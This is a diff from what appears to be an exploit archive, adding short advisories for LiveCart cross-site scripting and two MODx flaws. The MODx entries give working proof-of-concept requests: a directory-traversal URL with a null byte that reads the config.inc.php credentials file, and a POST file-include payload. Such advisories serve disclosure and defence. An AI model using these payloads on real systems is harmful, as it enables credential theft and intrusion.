\ No newline at end of file
diff --git a/platforms/php/webapps/30967.txt b/platforms/php/webapps/30967.txt
new file mode 100755
index 000000000..631ec651d
--- /dev/null
+++ b/platforms/php/webapps/30967.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27087/info
+
+LiveCart is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+LiveCart 1.0.1 is vulnerable to these issues; other versions may also be affected.
+
+http://www.example.com/user/remindComplete?email=XSS
\ No newline at end of file
diff --git a/platforms/php/webapps/30968.txt b/platforms/php/webapps/30968.txt
new file mode 100755
index 000000000..ffe4a1864
--- /dev/null
+++ b/platforms/php/webapps/30968.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27096/info
+
+MODx is prone to a vulnerability that allows attackers to access source code because the application fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to retrieve arbitrary files from the vulnerable system in the context of the webserver process. Information obtained may aid in further attacks.
+
+MODx 0.9.6.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/modx-0.9.6.1/assets/js/htcmime.php?file=../../manager/includes/config.inc.php%00.htc
\ No newline at end of file
diff --git a/platforms/php/webapps/30969.txt b/platforms/php/webapps/30969.txt
new file mode 100755
index 000000000..b0441b881
--- /dev/null
+++ b/platforms/php/webapps/30969.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/27097/info
+
+MODx is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability using directory-traversal strings to execute local script code in the context of the application. This may allow the attacker to access sensitive information that may aid in further attacks.
+
+MODx 0.9.6.1 is vulnerable to this issue; other versions may also be affected.
+
+Method=POST
+Action=http://www.example.com/modx-0.9.6.1/index-ajax.php?
+Name=as_language Value=../ajaxSearch_readme.txt%00
+Name=q Value=assets/snippets/AjaxSearch/AjaxSearch.php
\ No newline at end of file
diff --git a/platforms/windows/remote/30908.txt b/platforms/windows/remote/30908.txt
index 299fba910..3679d0c60 100755
--- a/platforms/windows/remote/30908.txt
+++ b/platforms/windows/remote/30908.txt
@@ -9,13 +9,6 @@ http://www.soapui.org/Downloads/download-soapui-pro-trial.html # Tested on: Windows, should work at Linux as well # CVE : CVE-2014-1202 - - -Hey guys. - -My name is Barak Tawily, I work for Appsec-Labs as information security -researcher. - I have been found remote code execution vulnerability in the SoapUI product, which allows me to execute a java code to the victim's computer via malicious WSDL/WADL file.
@@ -51,13 +44,6 @@ will take over it. This vulnerability was check on the version (4.6.3), a proof of concept video can be found at: http://www.youtube.com/watch?v=3lCLE64rsc0 - -malicious WSDL is attached. - -Please let me know if the vulnerability is about to publish - -Thanks, Barak. -